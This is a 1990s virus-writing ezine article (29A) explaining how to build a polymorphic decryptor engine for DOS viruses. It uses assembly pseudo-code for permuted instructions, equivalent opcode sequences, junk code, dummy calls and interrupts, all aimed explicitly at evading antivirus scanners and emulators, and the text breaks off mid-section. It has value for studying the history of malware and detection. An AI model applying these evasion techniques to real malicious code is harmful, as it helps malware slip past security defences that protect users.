Copy Link
Add to Bookmark
Report

29A Issue 02 02 09

eZine's profile picture
Published in 
29A
 · 28 Dec 2019

  

Analysis on the decryptor generation
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ>
Lord Julus

ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ
Û D I S C L A I M E R Û
Û Û
Û The following document is a study. It's only purpose is to be used in Û
Û the virus research only. The author of this article is not responsible Û
Û for any misuse of the things written in this document. Most of the Û
Û things published here are already public and they represent what the Û
Û author gathered across the years. Û
Û The author is not responsible for the use of any of these information Û
Û in any kind of virus. Û
Û Lord Julus. Û
ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ


ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Foreword ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ

Before saying anything I would like to apologize from the beginning
for my English mistakes, as I had to write this article really fast so I
had no time to spell/grammar check. Second of all, I am still under the
influence of the polymorphic engine I started to work on for some time
now (Lord's Multiple Opcode Fantasies). My routine was under development,
when I realised I really needed a document to read from, some place where I
could keep all the info I collect. That's when I started on this article
here. So, most of it is concentrated on the main idea I used in M.O.F. But,
in order to make it more simple to understand and more easy to explain I
made a few 'shorcuts', sort of speak. E.g., you'll get the main idea and
you'll be able to make your own poly engine after reading this, but you'll
have to use you're imagination. This may not be the final form of this
document. I might get new ideas or realize I made some mistakes. If I do
I'll write it again... (that's why I gave it a version number, 1.5).

So, for any comments, ideas, suggestions or mistakes you noticed
I can be reached via e-mail at this address:

lordjulus@geocities.com

Do not wait and write ! Be well,
Lord Julus.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Introduction ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Before the heuristic analysers and the code emulators appeared on
the market the usual encryption methods worked pretty good. And I do not
speak only about viruses. I also reffer to the methods used for protecting
software and data. Code emulators are able to crack your protections in a
matter of minutes. That's when the ideea of polymorphism arose. A coder from
Bulgaria passing by the nickname of Dark Avenger who wrote a lot of
destructive viruses (including an antivirus against two of his viruses who
unleashed a third virus) came with this ideea when his MtE (Mutation
Engine) appeared. What polymorphism is really all about is creating self
decrypting code, able to create each and every time a different decryptor
containing both decrypting code and also junk instruction designed to make
debugging and emultating harder.
As this article is not designed to explain why is this needed or make
a pro statement for polymorphism I will get directly to facts.

So, in my opinion a good poly engine should be able to:

þ Create different decryptors by:
ù generating different instructions which do
the same thing
ù swaping groups of instruction between them
ù creating calls to dummy routines

þ Generate junk instruction between real code
þ Being portable (can be included in any program)
þ Everything should be based on random numbers
þ Being able to create different size decryptors
þ It must be fast
þ It must be as small as possible

Something anyone can notice is that the biggest and complicated the
decryptor is, the biggest and complicated and *slower* is the polymorphic
engine. All you'll have to do is find a good balance, e.g. finding the
best level of polymorphism a fast and small routine can create.

In order to make this more easy to understand, I will use some
notations that are showed below:

a) General notations:

reg - general register (AX, BX, CX, DX)
preg - pointer register (SI, DI, BP)
sreg - segment register (CS, DS, ES, SS)
imm - immediate value (8 bit or 16 bit)
mem - memory location

(note that BX can also be used as pointer register but I will avoid
this case in this article)

b) Specific notations:

lreg - Register to hold code length
creg - Register to hold the code
kreg - Register to hold the key

sreg - Segment override for the source
dreg - Segment override for destination

preg - The pointer register
jreg - Junk register
jprg - Junk pointer register

key - Encryption key
keyi - Key increment
rndm - random number

length - Code length / 2 (because usualy the length is given in bytes
and I like to code on words)

In order to make the polymorphic engine (PME) create the decryptor
faster I will assume the following, even though this is a little against
the rules I gave for a good engine, but I will explained why:

þ AX will be the junk register
þ BP will be used as a delta handler
þ The engine will create equal size decryptors (this in order
to preserve the ability of a virus to hide the length of
the host using stealth procedures)

And now the reason: many OpCodes for instructions are optimized
for the register AX. This means that an instruction using the AX
register will be shorter than one involving the BX register. Now, you
probably think this is stupid... No ! That's because when generating
instructions you have a set of instructions that do the same thing.
Obviously the sum of bytes for each set will never be equal. If you
want to create a PME to generate equal size decryptors, you'll have
to pad with NOP's so all the sets will have same size. So, it's no use
to have an optimized AX instruction if you have to pad it anyway because
another instruction has more bytes. Instead, being the junk register,
the junk code will be optimized on AX. This means you can have more
junk instructions in the same space. I hope this clears it. (as you will
see further I will not take use of this either to make the poly smaller...)


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ General Decryptor ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

I will begin now with the general type decryptor and I will explain
the way it works. This code is usualy put at the end of code, but some
are put at the begining (I will not explain this here. MOF uses decryptors
in different places, but you have to take care of the Delta Handle). The
Decryptor is called from the beginning, decrypts the code and gives it the
control (i.e. jumps to it).
Notice each instruction will have a number for further use.

Decrypt proc near
[1] mov lreg, length ; get code length
[2] mov preg, startcode ; load pointer register
[3] push cs ; make both source and
[4] pop jreg ; destination segment
[5] mov sreg, jreg ; registers point to
[6] mov dreg, jreg ; the Code Segment
[7] mov kreg, key ; get the key

main_loop:
[8] mov creg, sreg:[preg] ; take an encrypted word
[9] call unscramble ; decrypt it (*)
[10] mov dreg:[preg], creg ; write decrypted word
[11] add kreg, keyi ; increment the key
[12] dec lreg ; decrement length
[13] inc preg ; increment pointer
[14] inc preg ; by 2
[15] jnz main_loop ; and loop until length=0
[16] ret ; return control
Decrypt endp

(*) I will get back to the unscrambling procedure later.

As you can see, this is a general decryptor which takes a word
from source:pointer, decrypts it and then puts it back to
destination:pointer (which in this case are the same). Also you may notice
I used the incremented style encryption key. And the increment is not 1
as most decryptors do, but a random number ! (I'll discuss random stuff
later too).


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Permuting Instructions ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

One of the very important things in a PME is the ability to
swap instructions or groups of instructions between them. Only this
feature is good enough to flame scan-string scaners. But we must be
very careful about what can be swaped and what can't, and so to
establish some rules. In our case this is how it goes:

Permutable instructions:

Permutable instructions are in the [1] - [7] range with the
following:
a) instruction [1] can be placed anywhere
b) instruction [2] can be placed anywhere
c) instruction [3] can be placed anywhere but always
above instruction [4]
d) instruction [4] can be placed anywhere but always
under instruction [3]
e) instruction [5] can be placed anywhere but always
under instruction [4]
f) instruction [6] can be placed anywhere but always
under instruction [4]
g) instruction [7] can be placed anywhere

Also permutable are instructions [10] - [14], which can be placed
in any order.

How do we permute the instructions. As you will see later, you will
have a routine for generating each of the above instructions. So, all
you have to do is make a matrix of bytes with the length 16, mark
the 8, 9, 15 and 16 positions with 8, 9, 15, 16 (as these can not be
permuted). Then fill the first part of the matrix (1-7) with numbers from
1 to 7 in a random order (being careful about the rules) and then fill the
10-14 part with numbers between 10-14 in a random order. Now, all you have
to do is call your routines in that order.

Example: 3,1,2,4,7,6,5,8,9,14,12,10,13,11,15,16
(this code does exactly the same thing as the one above).


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Coding Instructions ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Here comes the best part of a PME: coding instructions in different
ways. What does this mean ? Let's take an example:

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄ
Instruction ³ OpCodes ³ Total bytes
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄ
mov bx, 1000h ³ B8 00 10 ³ 3
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄ
xor bx, bx ³ 33 DB ³
or bx, 1000h ³ 81 CB 00 10 ³ 6
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄ
push 1000h ³ 68 00 10 ³
pop bx ³ 5B ³ 4
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄ
sub bx, bx ³ 2B DB ³
xor bx, 1000h ³ 81 F3 00 10 ³ 6
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄ
mov bx, 1000h xor 2222h ³ BB 22 32 ³
xor bx, 2222h ³ 81 F3 22 22 ³ 6
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄ

Each and everyone of the above combinations will do the same thing:
put the value 1000h into the BX register. Of course, the number of opcodes
involved in each case is different, as you can see. What we'll need to do
then is:
þ pick up a combination
þ generate it
þ see the difference between the bytes number of the choosen
combination and the one with the most bytes (6 in our case)
þ pad the instruction with junk to reach the max

You will notice that as the instruction is more simple, it is more
padded with junk and vice-versa.

Ok, so let's get back to our example and let's pick some variants
for each one of our instructions.

[1]/[2] mov lreg, length / mov preg, startcode
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(As I will explain later, many AV products tend to find out
for themselves different values, like the length of the
code or the start of code and so on. Therefore, I will use
a method to hide this. I will discuss it more in the
Armouring section)

a) push imm (imm = real data xor rndm)
pop reg
xor reg, rndm
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄ
11 bytes

b) mov ax, imm (imm = real data + rndm)
mov reg, ax
sub reg, rndm
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄ
11 bytes

c) xor reg, reg
xor reg, imm (imm = real data - rndm)
add reg, rndm
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄ
11 bytes

d) mov reg, 0
add reg, imm (imm = real data xor rndm)
xor reg, rndm
ÄÄÄÄÄÄÄÄÄÄÄÄ
11 bytes

e) mov reg, imm (imm = real data xor rndm)
xor reg, rndm
junk byte
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄ
11 bytes

[3] push cs Ä 1 byte
~~~~~~~~~~~~~~~~~~~~~~~~~~~
(we'll leave this like it is, it's much too usual)

[4] pop jreg
~~~~~~~~~~~~~~~~~~
a) mov jprg, sp
mov ax, ss:[jprg]
add sp, 2
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8 bytes

b) pop jprg
xchg ax, jprg
junk bytes \
... > six times
junk bytes /
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8 bytes

c) pop jprg
mov ax, jprg
junk bytes \
... > five bytes
junk bytes /
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8 bytes

[5]/[6] mov sreg, jreg / mov dreg, jreg
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
a) push ax
pop sreg
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
4 bytes

b) mov sreg, ax
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
4 bytes

c) pop jreg
xchg jreg, ax
mov es, ax
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
4 bytes


[7] mov kreg, key
~~~~~~~~~~~~~~~~~~~~~~~
a) mov reg, imm
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6 bytes

b) push imm
pop reg
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6 bytes

c) xor reg, reg
or reg, imm
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6 bytes

[8] mov creg, sreg:[preg]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
a) mov creg, sreg:[reg]
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6 bytes

b) push sreg:[reg]
pop reg
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6 bytes

c) xor reg, reg
xor reg, sreg:[reg]
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6 bytes

[9] call unscrambble Ä 3 bytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[10] mov dreg:[preg], creg
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
a) mov sreg:[reg], creg
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6 bytes

b) push reg
pop sreg:[reg]
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6 bytes

c) xchg reg, sreg:[reg]
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6 bytes

[11] add kreg, keyi
~~~~~~~~~~~~~~~~~~~~~~~~
a) add reg, imm
junk byte
junk byte
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9 bytes

b) mov ax, imm
add reg, ax
junk byte
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9 bytes

c) mov ax, reg
add ax, imm
xchg reg, ax
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9 bytes

d) xchg ax, reg
xor reg, reg
or reg, ax
add reg, imm
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9 bytes

[12] dec lreg
~~~~~~~~~~~~~~~~~
a) dec lreg
junk byte \
... > 8 times
junk byte /
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9 bytes

b) mov ax, rndm
sub lreg, ax
add lreg, rndmÄ1
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9 bytes

c) sub lreg, 1
junk byte \
... > six times
junk byte /
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9 bytes

d) xchg ax, lreg
dec ax
mov lreg, ax
junk byte \
... > five times
junk byte /
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9 bytes

[13]/[14] inc preg
~~~~~~~~~~~~~~~~~~~
a) mov ax, 1
add preg, ax
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8 bytes

b) xchg ax, preg
inc ax
xchg preg, ax
junk byte \
... > 5 times
junk byte /
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8 bytes

c) sub preg, rndm
add preg, rndm+1
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8 bytes

d) add preg, rndm
sub preg, rndmÄ1
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8 bytes

[15] jnz main_loop
~~~~~~~~~~~~~~~~~~~~~
(very important to code this good so the scaners don't see
it's a decrypt loop. We'll speak more in the Armouring
section)

a) push cx
mov cx, lreg
jcxz _label
pop cx
jmp main_loop
_label:
pop cx
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄ
10 bytes

b) mov ax, ffffh
add ax, lreg
jns main_loop
junk byte
junk byte
junk byte
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
10 bytes

c) xor ax, ax
sub ax, lreg
jns main_loop
junk byte \
... > six times
junk byte /
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
10 bytes

d) xchg ax, lreg
sub ax, 15h
cmp ax, 0FFEBh
xchg ax, lreg
je main_loop
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
10 bytes

And now, some discussion on these matters.
First of all, you notice I wrote those junk bytes *after* the real
code. You may choose to leave it this way, which will allow you to use
junk instruction involving the junk register too. But I'd suggest to insert
the junk bytes bewteen the real code, in this way having a better stealth
of the real code. But in this case, of course, you won't be able to use
junk instruction involving the junk register, unless they do nothing (like
ADD AX, 0), because the junk register is used in the real code. I'd
suggest the use of one byte or two bytes instructions BUT not in the last
set (15) bacause here we need our flags to stay put! Another thing about
the last pieces of code. You see there many conditional jumps. Well, they
will not work ! Why ? Because the jump to the main_loop is surely bigger
then -128 bytes. In this case all you have to do is change the code kinda
like this:

Instead of Use

Je Main_Loop Jne not_main_loop
jmp main_loop
not_main_loop:

This gives us 3 more bytes, making the loop jump go up to 13 bytes.

As you can see, I consider that the poly engine should drop directly
values into the decryptor, so you don't have to mess up with things like:

mov bx, [bp + 0542]

Instead, the engine will compute how much BP+0542 is and will put
the value there. This helps us in many directions. First of all, the AV's
are hunting for stuff like [BP+...], because it's the mose used way of
holding the Delta handle. But if we don't use it in our main decryptor,
we can safely use it in our junk instructions !! This bring us again to
messing up the AV. Check the Armouring chapter for more.

And last: I let the PUSH CS and RET instructions like they are,
but these can be coded in different ways too. Use your imagination !

In this area you can make whatever you want and desire. Any other
combinations can be added. After this is done, we can surely compute
the length of our main decryptor. So let's do it:

Main decryptor length =

11+11+1+8+4+4+6+6+3+6+9+9+8+8+10 = 104 bytes

So, our decryptor with some junk in it is 104 bytes. To this we should
add the unscramble procedure with which we shall deal later.

Now, only by permuting the instructions between them and adding the
extra junk code into it, we have an almost good poly decryptor. But we don't
wanna stop here !
Before jumping to generating instruction we should take a peek to...


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Creating junk instructions ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

The way to do this is:

In our code we have 16 sets of intructions we have to put garbage
after and we also should put garbage before the first instruction.
Studying the code I came up with this situation:

Bewteen ³ Nr. of junk instruction
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
0 Ä 1 ³ 15 to 20
1 Ä 2 ³ 10 to 15
2 Ä 3 ³ 0
3 Ä 4 ³ 10 to 15
4 Ä 5 ³ 10 to 15
5 Ä 6 ³ 5 to 10
6 Ä 7 ³ 10 to 15
7 Ä 8 ³ 15 to 20
8 Ä 9 ³ 5 to 10
9 Ä 10 ³ 5 to 10
10 Ä 11 ³ 10 to 15
11 Ä 12 ³ 10 to 15
12 Ä 13 ³ 10 to 15
13 Ä 14 ³ 10 to 15
14 Ä 15 ³ 10 to 15
15 Ä 16 ³ 10 to 15
16 Ä end ³ 15 to 20 (+ the rest)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

This is just my ideea, you can come up with something else.

So let's see which is the maximum amount of junk instructions we
can have. It's

15*10 + 10*3 + 20*3 = 150 + 30 + 60 = 240 junk instructions.

If we consider the longest junk instruction as being 4 bytes long,
then we'll have a maximum junk code of 4*240 = 960 bytes. This would
make our decryptor 960 + 104 = 1064 bytes long. The more junks you want to
put in the biggest the code will get.

How do we pick them ? Very simple. First we get a random number
between the limits. Then we make a loop to generate that amount of junk
instructions. For each we take a random between 1-4 which gives us the
length of the instruction. Then we take randomly one of that instruction
type (looking carefully to do not repeat the same instruction one after
another - which is kinda impossible). After we did this for all the code,
because of the fact that we use random numbers, it is virtualy imposible to
get the maximum of junks for each interval. Therefore at the end we will
have 960 total junks from which we only created a X nr. of junks. All we
have to do then is create an amount Y = 960-X and put them after the last
instruction. This is what I meant when I said (+the rest).

Now, one important thing. As you will see further, the 2, 3 and 4
bytes long instructions are much more soffisticated and make much mess.
That's why I suggest you to make a probability of 10% for 1 byte
instructions, 20% for two bytes instruction, 30% for 3 and 40% for 4 bytes
instructions. I thought of this taking into account that within the code
you already inserted a lot of 1 byte junks. You can also create 4 byte
garbage, by overriding the three byte ones (you'll see how).

Let's check a little the types of junk we can use. I said that we can
have a maximum 3 byte length instruction. I said so, because it's kinda
hard to generate 4 or 5 bytes instructions and still keep the code small.

[a] 1 byte instructions
^^^^^^^^^^^^^^^^^^^
CLI ¿ DEC AX ¿
STI ³ DEC AH ³
CLD ³ INC AX Ã affect AX
STD Ã affect INC AH ³
CLC ³ flags LAHF Ù
STC ³
CMC ³
SAHF Ù

About creating 2, 3 and 4 byte instructions it goes like this (but
this is not a rule, you'll have to read further):

þ the 2 byte ones are the register to register instructions
þ the 3 byte ones are usualy imm8 to register
þ the 4 byte ones are usualy imm16 to register and mem operations

Remember we have two junk registers: AX and one pointer register (DI
or SI). In the cases presented above (which you'll see further why are they
two bytes long), the 'reg' can be either AX or the jprg. And we also have
AX divided into AH and AL. We can perform any opperation over AH and AL,
the second register being any of the other 8 bit registers.

This is a rule:junk registers are used for junk instruction, but we
have exceptions from that. Here are cases when you can use them with any
register:

þ if cl/imm = 0 you can ROR/ROL/SHR/SHL any register
þ if imm = 0 you can ADD/SUB/AND/OR/XOR any register
þ if reg1=reg2 you can XOR any register
þ you can perform TEST/CMP on any register
þ you can XCHG any register with itself


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Creating calls to dummy routines ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

The creation of dummy routines and jumps is a very interesting feature
and is very good at messing up the AV's.
What we should basically look at are these:

CALL xxxx
JMP xxxx
J___ xxxx (conditional jumps)
RET

First, when we are about to create junk code we decide if:

A) we'll use CALL's
B) we'll use JMP's
C) we'll use both

From the beginning I'll tell you that using only calls is bad. Why ?
Simple... Our code goes line by line, right ? Imagine this situation:

Call _label Type 1 Dummy Call
(*) ...
...
_label:
...
...
Ret

When Ret is reached, the IP returns at the (*), but after a while the
Ret is reached again and here goes chaos. Or let's look at this:

(*) Type 2 Dummy Call
_label:
...
...
Ret
...
...
Call _label

This is also bad, because as the code is executed, it goes from (*) and
reaches the Ret... Again chaos.
We cannot skip the Ret's (even if we replace them with some POP's,
because the code still we'll come over the CALL again. Only in the first
case we can POP the CS:IP and get it over with, but it's dangerous. AV's
may notice that a CALL was made and there wasn't any RET for it...)
How can we solve this ?

First method: Use only JMPS.
The creation of a jump is really easy. All you do is put the opcode of
an absolutely random kind of jump and then a zero word and remember the
place of that word. You must see that the jmp is not in the last part of the
junk code ! Then, create the rest of the junk, by recording the length in
bytes of the junk after the JMP. This is done easily. As soon as one
instruction is generated, add it's length to a register. After you're done
with three, four, five or even more instructions, just go back to the place
where you wrote the 0 and write the length recorded. This length is equal
to the offset of the jump destination minus jump offset minus 2 (in the case
of 8bit displacement). Let's take an example:

0100 EB06 Jae 0108
0102 A800 Test al, 00
0104 2D2310 Sub ax, 1023h
0107 FB Sti
0108 83E701 And di, 1

So we have 'A8 00 2D 23 10 FB' - 6 Bytes -> other junk
'EB 06' - 2 Bytes -> JMP code

06 = 108 - 100 - 2

It is very important to compute very corectly the jump destination. You
cannot make it random ! Imagine you wrote JAE 105 instead of JAE 108. The
code would go directly to '23 10' (e.g. add dx, [bx+si]), messing all up.

What I described above is a jump 'downwards' the code. In order to
make a jump 'upwards' the code, take this example:

0100 A800 Test al, 0
0102 81EB0001 Sub bx, 100
0106 B81000 Mov ax, 10
0109 EBF5 Jmp 100

In order to generate this call we have the following fomula:

Jump length = jump address - destination address + 2.

In our example: 109 - 100 + 2 = 11
Then we simply negate this number:

11 = 0Bh
-11 = F5h (which is exactly what apperes in
the opcode: EBF5)

Use all kinds of jumps, especially conditional ones, because as this
is junk code, it doesn't really matter if the jump is done or not. You really
need to use the JMP instruction if you decide to take the other way:

Using Calls and Jmps.

I showed you how a Call cannot be created into a code that goes normaly
because it will hang. Here comes the JMP to help us.
So, your random routine decided that you will use CALL+JMP.
Then your random routine must decide which kind of CALL it will make
(as in the examples above). Let's analyse the two examples and see how the
JMP solves the problem:

Call _label Type 1 Dummy Call & Jmp
(*) ...
Jmp _label2
...
_label:
...
Ret
...
_label2:

---------------------------

(*) Type 2 Dummy Call & Jmp
...
Jmp _label2
_label:
...
Ret
...
_label2:
...
Call _label

So, what the JMP actually does is avoid the second passing across the
Ret instruction.

In the first case:
þ Write CALL 0000
þ Write JMP 0000
þ Compute _label and change the CALL accordingly
þ Write the Ret
þ Compute the _label2 and change the JMP accordingly

In the second case:
þ Write Jmp 0000
þ Write the Ret
þ Compute _label2 and change the JMP
þ Write Call _label (you know _label already)

Of course, between these instructions you can let your imagination
run free. I would suggest to put in the '...' place a random number of
instructions which would vary from 1 to 5.

Now, a really wonderful thing is to 'remember' such a CALL you
created during the junk code generation and 'come back' to it. That is,
you create a type 2 call and you keep the _label stored somewhere. Then,
when you want to create another dummy call you just create the CALL
instruction and put the _label as the address. This saves time in creating
junk routines. Here is an ideea about how it would look:

...
Jmp _label2
_label:
...
Ret
...
_label2:
...
Call _label
...
...
Call _label

This is easily done and creates a better image of a structured
program. Of course, in the '...' place you'll have both junk instructions
as well as parts of the real decryptor.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Creating dummy interupt calls ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Here is a list of interrupts you can insert into your code and how
they would afect registers (in brankets):

þ INT 21h, with the following AH contents:

ù 0Bh - get input status (AL)
ù 0Dh - flush buffers (none)
ù 19h - get current disk (AX)
ù 4Dh - get terminate status (AX)

þ INT 10h, with the following AH contents:

ù 08h - read char from cursor (AX)
ù 0Dh - read pixel from screen (AL)

So, all you have to do is generate a Mov ah, xx and then an INT. Very
simple and very effective (most scanners die under these).
But beware, many people are tempted to use dummy calls like INT03 or
INT01. Don't do this. This is flaged by most AV's. This goes into the
Armouring section, which we'll discuss later.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Getting random registers ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

We'll talk later about the random number routine. But first let's see
how we store the order of our registers.
We have the following notations:

reg field - a code that keeps the register to be used
sreg field - a code that keeps the segment register
r/m field - how is the instruction made (based, indexed, etc.)
mod field - who makes the indexing (i.e. DI, BP, etc.)
dir field - the direction
w field - word mark

reg field:
~~~~~~~~~~
AX or AL - 000 = 0
CX or CL - 001 = 1
DX or DL - 010 = 2
BX or BL - 011 = 3
SP or AH - 100 = 4
BP or CH - 101 = 5
SI or DH - 110 = 6
DI or BH - 111 = 7

When coding an instruction where word or byte registers could be
involved, they way too see which is the case is the 'w' bit. If it's 1
then we are talking word registers. If it's 0 we use byte registers.

sreg field
~~~~~~~~~~
ES - 001 = 1
CS - 011 = 3
SS - 101 = 5
DS - 111 = 7

r/m field
~~~~~~~~~
00 - based or indexed
01 - based or indexed with a 8-bit displacement
10 - based or indexed with a 16-bit displacement
11 - two register expresion

mod field (if r/m is based or indexed)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
000 - [BX+SI]
001 - [BX+DI]
010 - [BP+SI]
011 - [BP+DI]
100 - [SI]
101 - [DI]
110 - IF R/M = 00 A DIRECT MEMORY OFFSET OTHERWISE [BP]
111 - [BX]

segment overrides
~~~~~~~~~~~~~~~~~
ES - 00100110 - 26h
CS - 00101110 - 2Eh
SS - 00110110 - 36h
DS - 00111110 - 3Eh

Direction
~~~~~~~~~
If set, reg is the destination and mod is the source, otherwise it's
the other way around.

In order to choose a random order of the registers we must have this:

reg_table: db 11011000 ;bx cx dx
db 11100100 ;bx dx cx
db 01111000 ;cx bx dx
db 01101100 ;cx dx bx
db 10011100 ;dx cx bx
db 10110100 ;dx bx cx

Just pick randomly one of the combinations and you'll have the
registers to use: lreg, creg, kreg.
So in a very simple way, we got our registers to use. And remember
that AX is the junk register. In the same way, you can pick the pointer
register leaving the other one as junk pointer register.

Now let's see an example of how to generate a mov.
If you disassemble a program that contains this line:

MOV BX, [SI+0134h]

